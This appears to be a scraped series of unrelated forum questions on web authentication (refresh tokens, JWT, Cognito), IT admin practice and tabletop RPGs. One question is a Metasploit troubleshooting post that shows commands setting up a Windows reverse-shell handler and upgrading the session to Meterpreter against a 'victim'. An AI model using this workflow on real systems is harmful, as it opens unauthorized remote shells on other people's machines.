Authentication in Next.js application (SSR SPA with long sessions)

We’re currently developing a Next.js application (server side rendering) and are looking for secure ways to keep the users logged in for longer periods of time.

AFAIK this can either be done using silent authentication or refresh tokens. General note: When a user is not logged in yet, we can redirect the user to a login page. If the user enters their credentials, we use the Authorisation Code Grant (to my knowledge PKCE is not needed in this case as it’s all server side during these steps) that will redirect back and respond with an authorisation code. We can then exchange this authorisation code with an access token (and refresh token) using a client secret (all server side).

Refresh Tokens

Since any client side storage (local storage, cookies, etc.) is not safe (XSS attacks) for storing any kind of tokens (especially refresh tokens), we are wondering if it’s generally safe to store a refresh token (and access token) in a HTTP only cookie considering that…

  • … the token values are encrypted, e.g. AES, with a secret that is not exposed to the client side.
  • … the refresh tokens are rotating, so when you retrieve a new access token with your refresh token, you also receive a new refresh token. The old refresh token is invalidated and if used again, all refresh tokens are invalidated.
  • … the refresh token automatically expires after a couple of days, e.g. 7 days.

Silent Authentication

A possible alternative could be silent authentication via an auth request on the server side (prompt=none). The auth session for the silent authentication would also be stored in a HTTP only cookie.

In both scenarios, it’s probably necessary to make sure that the client doesn’t know about any of these tokens (You could potentially use silent authentication on the client side using an iframe (the domain is the same, just different subdomains) but the client would then potentially receive a new access tokens which has to be stored in memory (potential XSS vulnerability)).

Since it’s a server side rendered SPA, the client side still needs to be able to get new data from the API server using the access token. For this, we were thinking of using Next.js API routes as a proxy: So, if the client wants to get new data, it will send an AJAX request to the respective Next.js API route. The controller for this Next.js API route is able to read and decrypt the HTTP only cookie and can therefore send the request to the API server with a valid access token in the HTTP header. Just before the short lived access token expired, the controller would need to first send a request to the auth server to retrieve a new access (and refresh) token and then continue sending the request with the new access token to the API server.

While this sounds good and feasible in theory, we are wondering about the following points: 1.) Is it generally safe to save a (rotating) refresh and access token in a HTTP only cookie? Does the cookie value need to be encrypted or is that unnecessary? Does a rotating refresh token offer any additional security in this case? 2.) Is the “Next.js API route as a proxy” method a secure way to make sure that the client side can get new data from the API server? If e.g. would try to send a request to the (“unprotected”) Next.js API route, it would not respond with any data as it’s a different domain and the HTTP only cookies therefore not accessible, correct? Is CSRF possible for these Next.js API routes? 3.) Is it safe if the HTTP only cookie for the refresh token is shared across all subdomains and not tied to one specific subdomain (application)? This would allow us to access the cookie from e.g. the actual website or other subdomains. 4.) Is the refresh token approach better / safer than the silent authentication approach?

Follow-Up question: Can the refresh token approach also be used the authenticate users in a browser extension? So:

1.) The user logs in (Authorisation Code Grant with PKCE): The login prompt/page is shown in a popup (or new tab) and the communication (authorisation code) is done through postMessage. 2.) The background script receives the authorisation code and exchanges it for an access token and rotating refresh token (which is probably necessary in this flow (?)) using the code and a code verifier. These tokens can then be saved in Chrome storage. We can potentially also encrypt the tokens but I’m not sure if that offers any additional protection (?) considering that the background script is not the same as a server. 3.) If the Chrome extension wants to receive data from the API server, it sends a message to the background script which will then send the API request using the tokens saved in Chrome storage.

Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to the rest then I can add more in later

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look at the script I can upload it to github and share the link(thought its nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp payload => windows/x64/shell_reverse_tcp msf5 exploit(multi/handler) > set LPORT 549  LPORT => 443 msf5 exploit(multi/handler) > set LHOST LHOST => msf5 exploit(multi/handler) > run  [*] Started reverse TCP handler on  [*] Command shell session 1 opened ( -> at 2020-05-30 22:31:25 -0400   Login: password You have a shell have fun #> background  Background session 1? [y/N]  y msf5 exploit(multi/handler) > sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]  

The Issue:

[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on  [-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass [-] Call stack: [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32' [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token' [-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec' [-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?' [-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'  

Note: I have taken a look at some of the files, but they seem to be coded in ruby(something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seems to be similar issues posted on github if it helps.

Are JWT still not recommended for sessions?

It seems there is a large divide as to wether or not you should have JWT or Session ID for managing user session on WebApp/API (for a web front end or/and a mobile app).

It seems that the consensus goes to not using JWT (1,2,3,4) and keep on using cookies but i’ve seen more and more tutorials and people using JWT by default.

Even OSWAP now use JWT as session token instead of cookies (it is stored in the authorisation header/cookies and not in local storage obviously… but that not a hard task).

I’m trying to look at it neutrally and they seem to fit my usage:

  • session id also have an expiration date that can be long or short so i fail to see how it is an argument.
  • session id are persisted in the backend so having a blacklist for JWT doesn’t seem to be a “worst” solution
  • implementation are of the same level off complexity.

While with JWT i can:

  • store data inside the cookie is a nice feature to have (for roles for example)
  • fail my queries early if the token is in the blacklist/ if the data stored in the token is not validated (ie: try to access a route where your role, stored in the jwt, shouldn’t have access)
  • can be stateless on some routes, if needed / possible / less security required (no blacklist).
  • can be used as one time tokens for download

Is it still not recommended to use them as session? are there security issues i’m not aware of? Both could work for my use case but jwt would allow me to do more and currently i’m leaning towards using session “just because” of the consensus.

Where can I find transcripts of actual game sessions?

Some of us are getting together to play an RPG, but not everyone has been in one before. One of the prospective players has asked me for a transcript or something they could read to get a sense of what actually goes on in a game. I’d point them to a podcast, as in Where can I find actual play podcasts for RPGs?, but I’d like to read it myself first (and I can’t listen to podcasts), so:

Where can I find written transcripts of actual game sessions?

I’m basically looking for a script like:

John (Thograk the Orc): I dig through the pile of dead rats. Susie (Minzen the Paladin): Eww, that's gross!  Why did we invite this orc again? Frank (DM): Some of the rats look tastier than others, but no, you don't find     the Barrel of Healing buried in the pile. 

but from an actual game.

In memory JWT for API auth with HTTP-only cookie for sessions?

I’ve spent a while reading about this, and I know it’s a common topic, but I was hoping to get some feedback on my authentication approach.

I have an SPA. It needs to authenticate to 1) my application backend and 2) some APIs on AWS. I’m using cognito to authenticate user credentials.

My idea on approaching this is as follows:

  1. User authenticates via AWS Cognito API
  2. Receives JWT
  3. Keeps JWT in memory only (no local storage — XSS)
  4. Passes JWT to application backend
  5. Backend sets HTTP-only secure cookie on the client, STORING the JWT inside this cookie.
  6. Cookie is used to maintain sessions with the app backend
  7. In-memory JWT is used to authenticate with AWS APIs

This is fine-and-dandy, but when the user closes browser or switches tabs, they won’t have the JWT in memory. However, they’ll still have the session cookie. So my thought is that it will ask the application server for the JWT (inside the cookie) before hitting the AWS APIs.

In this fashion, I have a secure HTTP-only cookie that maintains sessions with my app server, and I also have the JWT to authenticate with the AWS APIs. If the user has a valid session cookie, it means they should allowed to have the JWT contained within it.

My only concern with this is that it seems a little circular. JWT authenticates to receive cookie, which authenticates in the future to receive a refreshed JWT. Otherwise, I think it seems pretty solid.


Can you use a “History” check to remind players of events from previous sessions or their backstory?

My players and I are starting a new campaign soon, with brand new characters set in the same world and after all of our previous campaigns. In the first session, I plan on having them run into some cultists that the players (but not the characters) have encountered in a previous campaign. One of the new characters was a student of one of the old characters, and it is mentioned in their backstory that “he showed me a museum of his previous adventures.” Would a History check be used to determine if this new character identifies the cultists from the museum?

More generally, what’s the time limit on a History check? Can they roll a history check to see if they remember things from the previous session? From their backstory? Or is it explicitly past events they did not experience? If this is the case, then what sort of check would I use for more recent history, like a “memory” check? Straight Wisdom, Investigation, straight Intelligence, Perception?

Best practices or advice to convince IT admins not to map network drives in privileged sessions with users

Why are currently trying to enhance the security posture of our company, and this means changing how some IT personnel work.

Precisely, our IT helpdesk now have 2 separate accounts: 1 for normal day to day usage (mails, internet, etc…), and 1 for administrative tasks. The later is a privileged account having several rights on the AD and some servers.

The way they work is not very secure when it comes to supporting the users: they use their privileged account to login to the user’s workstation and perform tasks where admin rights are needed.

But my question is more accurately related to network drives being mapped in their privileged account’s profile. They insisted on using the same logon script as with their standard account.

Do you have any recommendations, references to guidelines and/or best practices in such a case ? I’d like to present them some resources to convince them it’s not secure to have network drives mapped in this profile.

I tried to explain to them that if they log in a ‘contaminated’ workstation, their privileges might spread the infection to the network… But they did not understand and argued they need to access some files on the network while assisting the users. They don’t want to waste time typing UNC path, etc…

Should I Record our online D&D Sessions?

Context: My D&D group, this past year, has made the transition from AD&D to 5e. This has been helpful for a number of things, but particularly for taking full advantage of modern resources like Roll20. We switched to the virtual tabletop when meeting in person regularly become increasingly difficult. Now we are able to meet bi-weekly, despite living in a few different states across the US.

One of those modern resources I’ve personally been hung up on, however, is recording. I’m the resident DM of my group, and although we occasionally have other campaigns, mine is the go-to. We probably stayed with AD&D so long because it was what I knew, and I am admittedly a bit of a traditionalist. Change has been good thus far!

Still, I favour note-taking a great deal. I like the engagement it creates, and that it creates a way for my players to refer to things they should know in-character despite perhaps having forgotten details over the weeks. I have a pretty solid grip on what goes on in my sessions, but it also lets my players catch something that maybe I have missed that they deem important, and want to investigate, despite my forgetting it.

On the other hand, I have found a resource that would allow me to simply record everything that happened in our roughly 4-5 hour sessions, and play it back perfectly as it was. This is fantastic! I have toyed around with it (GeForce Experience is the overlay) and used it already to create instant replays of boss fights, or something funny that transpired.

There are a few reasons I see recording particualry helpful:

  • It gives a “frozen-in-amber” snapshot of a session, which can be great for memories

  • it makes it easy for us to go back and check exactly what happened

  • it provides a way to let others watch what they missed in a session if they have to leave, or can’t make it

  • It could be a substitute for note-taking, so players can focus on the now and worry about notes later

  • my players could record the sessions anyway without my knowing, if they wanted their own recordings, so even if I personally don’t record they may still happen (I trust my players, but feel this is a valid point for anyone having this debate)

  • even with a recording, you capture everything, not merely the points you deem important. This may require note-taking anyway, because you can’t look at an mp4 file and know at-a-glance what you feel the important things that happened were

  • importantly, many of my players do not favour taking notes anyway, and their opinion is as valid as mine here

I have my concerns:

  • it could discourage note-taking, something that shows a willful intention to be engaged. I worry having recordings of exactly what happened may create less of a drive for this engagement, and I shouldn’t be punishing the players who are trying harder to stay on top of what is going on in the campaign

  • this program shows exactly what is happening on my screen, so players would see my notes (there are workarounds such as ripping out the video, which isn’t ideal but possible. Having another player record, which is less consistent. Keeping my notes on another monitor, which only partly works with Roll20–some info kept from them is inevitably visible on my end of the tabletop)

  • I like the traditional feeling of D&D, where everyone gets together, has a fun time, and is free to act how they want. I worry that with a recording, there will be less authenticity to that spontaneity. This could be good or bad–players may consider their wording more, their actions may be more deliberated over–but that might take away from some of the freedom that comes with playing with a group of close friends, not worrying about whoever else would hear you in the recording. (I have some shy roleplayers)

This last point is probably trickiest. The simplest solution would be to ask my players, but while the player in my group who DMs second-most intends to record his next campaign, the rest haven’t shared a strong opinion. I am familiar with the research that says people perform better when their recorded, and that’s fine, but I don’t want anything to feel forced. Authenticity is important to me.

A disclaimer: I have not watched any D&D podcasts, so this has not influenced my opinion for better-or-worse. I also suspect that playing for an audience deliberately is its own matter, and should be addressed in its own breadth. I would consider it off-topic for my question, where we have no intention at present of sharing these recordings beyond our group. I merely mention people may be shy or conscientious because there is a “camera” at all.

For those of you who have tried recording either in-person meets, or sessions held over virtual tabletops with programs to record your sessions, how do you feel it has affected your campaign and your players? Are my concerns valid, or am I stuck in the past?